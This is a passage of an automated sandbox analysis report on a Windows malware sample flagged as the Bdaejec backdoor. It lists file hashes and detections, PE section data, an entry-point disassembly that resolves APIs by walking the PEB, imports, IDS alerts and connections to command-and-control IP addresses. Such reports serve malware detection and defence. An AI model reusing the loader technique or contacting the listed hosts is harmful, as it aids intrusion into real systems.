                                                                                  SHA-512:5F312D9FAD04CF16D30E53C56D85FC083E30ACB73520BA665A9DE88FE2E8B61F198A1620BE864BAEC6791FC9F525F1CD139CFB0A3133D40659938EA09E54062E
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425196" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:modified
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):1.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nv:9
                                                                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                  Malicious:false
                                                                                  Preview:foo.
                                                                                  Process:C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):15872
                                                                                  Entropy (8bit):7.031075575407894
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                                                                  MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                                                  SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                                                                  SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                                                                  SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: 63D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exe, Detection: malicious, Browse
                                                                                  • Filename: 641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exe, Detection: malicious, Browse
                                                                                  • Filename: 62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exe, Detection: malicious, Browse
                                                                                  • Filename: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, Detection: malicious, Browse
                                                                                  • Filename: 5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe, Detection: malicious, Browse
                                                                                  • Filename: 5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exe, Detection: malicious, Browse
                                                                                  • Filename: 58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exe, Detection: malicious, Browse
                                                                                  • Filename: 5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exe, Detection: malicious, Browse
                                                                                  • Filename: 56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exe, Detection: malicious, Browse
                                                                                  • Filename: 54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):1835008
                                                                                  Entropy (8bit):4.420535970056118
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:lcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNi5+:Ci58oSWIZBk2MM6AFBAo
                                                                                  MD5:755FEE7C4E13437E02CFE2DB61DD0375
                                                                                  SHA1:DFCB2354AE1FC425292B2D1DDE48DEFC738FA6B3
                                                                                  SHA-256:E258C34736098DEA59726B404ED3399A97701ADDCEBB7D9C05E465B5AC352890
                                                                                  SHA-512:33CAD4A3EA2DA216EE874FC9FC29EBFA07CC4AEFCCB2AAA18C217268E62F97D91CFC6B6CA8B2EED7EA7A963304D94391C9329F79544B282403934B8B50634FF7
                                                                                  Malicious:false
                                                                                  Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm**V.................................................................................................................................................................................................................................................................................................................................................R=@.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):6.395294234307551
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
                                                                                  File size:1'803'264 bytes
                                                                                  MD5:7bb46178f57f6ea01347b1790d7bfa27
                                                                                  SHA1:bad79fb2e79f12feabd5249636537842e45b9bef
                                                                                  SHA256:ded8995ef3dc7ea298fa16e1733b033e06261a76e1639430d4808600884c7467
                                                                                  SHA512:86ea26f7f142020e1738de929b6de90400cfa7a1e7b8f69aa62c46b98c220e8f9966eb319bae04fef5c23cea21935d4f10c944e16e4bce4e2e47e5d7c30d9da5
                                                                                  SSDEEP:24576:DKAgpBGV2HpWHuREjDnI2AuADZ8KvqC75H2dtDPc/ExKFY/fwg:vgpG57R8InDPcsxKC/fwg
                                                                                  TLSH:5A858F03E24261B6D8E6417385BE46BE8C246D35235C60DFB3847E6A65714F33B36E2B
                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........@...............-.......+.w.....+.......*.......-.......&.......*.......(......./......./.7.....*.......+....................
                                                                                  Icon Hash:1cb3716727070706
                                                                                  Entrypoint:0x5be000
                                                                                  Entrypoint Section:=Jcu
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x623D6344 [Fri Mar 25 06:37:56 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:d69e4c13e25f0ad622344ac56118c0df
                                                                                  Instruction
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 0000016Ch
                                                                                  xor eax, eax
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  mov dword ptr [ebp-24h], eax
                                                                                  mov dword ptr [ebp-10h], eax
                                                                                  mov dword ptr [ebp-14h], eax
                                                                                  mov dword ptr [ebp-08h], eax
                                                                                  mov dword ptr [ebp-0Ch], eax
                                                                                  mov dword ptr [ebp-20h], eax
                                                                                  mov dword ptr [ebp-18h], eax
                                                                                  mov dword ptr [ebp-48h], 7853444Dh
                                                                                  mov dword ptr [ebp-44h], 652E5568h
                                                                                  mov dword ptr [ebp-40h], 00006578h
                                                                                  mov dword ptr [ebp-3Ch], 00000000h
                                                                                  call 00007F317895FF15h
                                                                                  pop eax
                                                                                  add eax, 00000225h
                                                                                  mov dword ptr [ebp-04h], eax
                                                                                  mov eax, dword ptr fs:[00000030h]
                                                                                  mov dword ptr [ebp-28h], eax
                                                                                  mov eax, dword ptr [ebp-04h]
                                                                                  mov dword ptr [eax], E904C483h
                                                                                  mov eax, dword ptr [ebp-04h]
                                                                                  mov dword ptr [eax+04h], FFF27CB2h
                                                                                  mov eax, dword ptr [ebp-28h]
                                                                                  mov eax, dword ptr [eax+0Ch]
                                                                                  mov eax, dword ptr [eax+1Ch]
                                                                                  mov eax, dword ptr [eax]
                                                                                  mov eax, dword ptr [eax+08h]
                                                                                  mov ecx, dword ptr [eax+3Ch]
                                                                                  mov ecx, dword ptr [ecx+eax+78h]
                                                                                  add ecx, eax
                                                                                  mov edi, dword ptr [ecx+1Ch]
                                                                                  mov ebx, dword ptr [ecx+20h]
                                                                                  mov esi, dword ptr [ecx+24h]
                                                                                  mov ecx, dword ptr [ecx+18h]
                                                                                  add esi, eax
                                                                                  add edi, eax
                                                                                  add ebx, eax
                                                                                  xor edx, edx
                                                                                  mov dword ptr [ebp-30h], esi
                                                                                  mov dword ptr [ebp-1Ch], edx
                                                                                  mov dword ptr [ebp-34h], ecx
                                                                                  cmp edx, dword ptr [ebp-34h]
                                                                                  jnc 00007F317896005Eh
                                                                                  movzx ecx, word ptr [esi+edx*2]
                                                                                  mov edx, dword ptr [ebx+edx*4]
                                                                                  mov esi, dword ptr [edi+ecx*4]
                                                                                  add edx, eax
                                                                                  mov ecx, dword ptr [edx]
                                                                                  add esi, eax
                                                                                  cmp ecx, 4D746547h
                                                                                  jne 00007F317895FF64h
                                                                                  cmp dword ptr [edx+04h], 6C75646Fh
                                                                                  jne 00007F317895FF5Bh
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x14455c0xa0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x14f0000x65768.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1b50000x80d4.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x13d8d00x38.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x13da000x18.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x13d9080x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x11a0000x30c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x1123510x112400260b90c2cc239bb9a96cb68acd909348False0.5049807358135825data6.558377237006261IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .ottwaed0x1140000x575a0x58007099e3d65d80971808525f8cf6c161aeFalse0.4733664772727273data6.013704941772504IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x11a0000x2b71a0x2b800e964960a2a657bc42f743bd61cfde340False0.4491401760057471data5.821571252633695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x1460000x77e40x2e00e1a3020d65f0d98b42aa980307bd5cebFalse0.2523777173913043PGP symmetric key encrypted data - Plaintext or unencrypted data3.8961145936273938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .ottwaed0x14e0000x500x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x14f0000x657680x65800ae79857cac56a3cd040cc978ddcc2a41False0.24274553571428573data4.457508526027022IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1b50000x80d40x820026a93cabdfe65efede018ff101864f68False0.708203125data6.647793149697268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  =Jcu0x1be0000x50000x42009b31c0f358f52fe53e51e7c39ee345c9False0.7775213068181818data6.934615013255218IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  ZIP0x1a81380xc4afZip archive data, at least v1.0 to extract, compression method=storeChineseChina0.9677861412881571
                                                                                  RT_ICON0x14f3900x130Device independent bitmap graphic, 32 x 64 x 1, image size 128ChineseChina0.7302631578947368
                                                                                  RT_ICON0x14f4c00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152ChineseChina0.4121951219512195
                                                                                  RT_ICON0x14fb280x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512ChineseChina0.5134408602150538
                                                                                  RT_ICON0x14fe100x128Device independent bitmap graphic, 16 x 32 x 4, image size 128ChineseChina0.597972972972973
                                                                                  RT_ICON0x14ff380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsChineseChina0.5650319829424307
                                                                                  RT_ICON0x150de00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsChineseChina0.6159747292418772
                                                                                  RT_ICON0x1516880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsChineseChina0.4277456647398844
                                                                                  RT_ICON0x151bf00x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336ChineseChina0.11034263396159423
                                                                                  RT_ICON0x193c180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.15828699869868687
                                                                                  RT_ICON0x1a44400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.27344398340248965
                                                                                  RT_ICON0x1a69e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.3550656660412758
                                                                                  RT_ICON0x1a7a900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.526595744680851
                                                                                  RT_GROUP_ICON0x1a7ef80xaedataChineseChina0.6149425287356322
                                                                                  RT_VERSION0x1a7fa80x18cPGP symmetric key encrypted data - Plaintext or unencrypted dataChineseChina0.5656565656565656
                                                                                  RT_MANIFEST0x1b45e80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                  DLLImport
                                                                                  KERNEL32.dllGetComputerNameW, GetModuleFileNameA, GetCurrentProcessId, OpenProcess, GetModuleFileNameW, SetLastError, WaitForSingleObject, CreateEventW, FreeLibrary, WinExec, GetPrivateProfileStringW, CopyFileW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, LocalFree, LocalAlloc, LoadResource, FindResourceW, SizeofResource, LockResource, GetTickCount, GetCurrentThread, Sleep, GetProcessHeap, HeapAlloc, GetLastError, GetTempPathA, SetCurrentDirectoryW, GetShortPathNameA, LoadLibraryW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, SystemTimeToFileTime, DosDateTimeToFileTime, GetCurrentProcess, DuplicateHandle, CloseHandle, WriteFile, SetFileTime, SetFilePointer, ReadFile, GetFileType, CreateFileW, CreateDirectoryW, TerminateProcess, GetCurrentDirectoryW, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, GetTimeZoneInformation, GetFileSizeEx, GetConsoleOutputCP, SetFilePointerEx, ReadConsoleW, GetConsoleMode, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetCommandLineW, GetCommandLineA, GetStdHandle, ExitProcess, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, RtlUnwind, RaiseException, GetStringTypeW, WriteConsoleW, GetCPInfo, CompareStringEx, LCMapStringEx, DecodePointer, EncodePointer, InitializeCriticalSectionEx, InitializeSListHead, GetStartupInfoW, IsDebuggerPresent, GetModuleHandleW, ResetEvent, SetEvent, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FlushFileBuffers, QueryPerformanceCounter, MapViewOfFile, CreateFileMappingW, AreFileApisANSI, TryEnterCriticalSection, HeapCreate, HeapFree, EnterCriticalSection, GetFullPathNameW, GetDiskFreeSpaceW, OutputDebugStringA, LockFile, LeaveCriticalSection, InitializeCriticalSection, GetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, FormatMessageW, GetDiskFreeSpaceA, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, FlushViewOfFile, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, GetSystemInfo, HeapCompact, HeapDestroy, UnlockFile, LockFileEx, GetFileSize, DeleteCriticalSection, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA
                                                                                  ADVAPI32.dllLookupPrivilegeValueW, AdjustTokenPrivileges, LookupAccountNameW, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, SetSecurityDescriptorDacl, IsValidSecurityDescriptor, InitializeSecurityDescriptor, InitializeAcl, GetTokenInformation, GetLengthSid, FreeSid, EqualSid, DuplicateToken, AllocateAndInitializeSid, AddAccessAllowedAce, AccessCheck, OpenThreadToken, OpenProcessToken
                                                                                  SHELL32.dllShellExecuteExA
                                                                                  ole32.dllCoInitializeEx, CoGetObject, CoUninitialize
                                                                                  WININET.dllInternetGetCookieExA
                                                                                  NETAPI32.dllNetbios
                                                                                  ntdll.dllRtlInitUnicodeString, NtFreeVirtualMemory, LdrEnumerateLoadedModules, RtlEqualUnicodeString, RtlAcquirePebLock, NtAllocateVirtualMemory, RtlReleasePebLock, RtlNtStatusToDosError, RtlCreateHeap, RtlDestroyHeap, RtlAllocateHeap, RtlFreeHeap, NtClose, NtOpenKey, NtEnumerateValueKey, NtQueryValueKey
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  ChineseChina
                                                                                  EnglishUnited States
                                                                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                  2024-07-24T17:32:58.302312+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6538953192.168.2.71.1.1.1
                                                                                  2024-07-24T17:33:09.618305+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49706799192.168.2.744.221.84.105
                                                                                  2024-07-24T17:33:03.941904+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49704799192.168.2.744.221.84.105
                                                                                  2024-07-24T17:33:06.916379+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49705799192.168.2.744.221.84.105
                                                                                  2024-07-24T17:33:00.043959+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49699799192.168.2.744.221.84.105
                                                                                  2024-07-24T17:33:12.689053+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49708799192.168.2.744.221.84.105
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jul 24, 2024 17:32:58.418312073 CEST49699799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:32:58.766522884 CEST7994969944.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:32:58.766607046 CEST49699799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:32:58.785686016 CEST49699799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:32:58.801038027 CEST7994969944.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:32:58.868598938 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:32:58.868650913 CEST44349700172.232.25.148192.168.2.7
                                                                                  Jul 24, 2024 17:32:58.868716955 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:32:59.059973955 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:32:59.060019970 CEST44349700172.232.25.148192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.043832064 CEST7994969944.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.043874979 CEST7994969944.221.84.105192.168.2.7
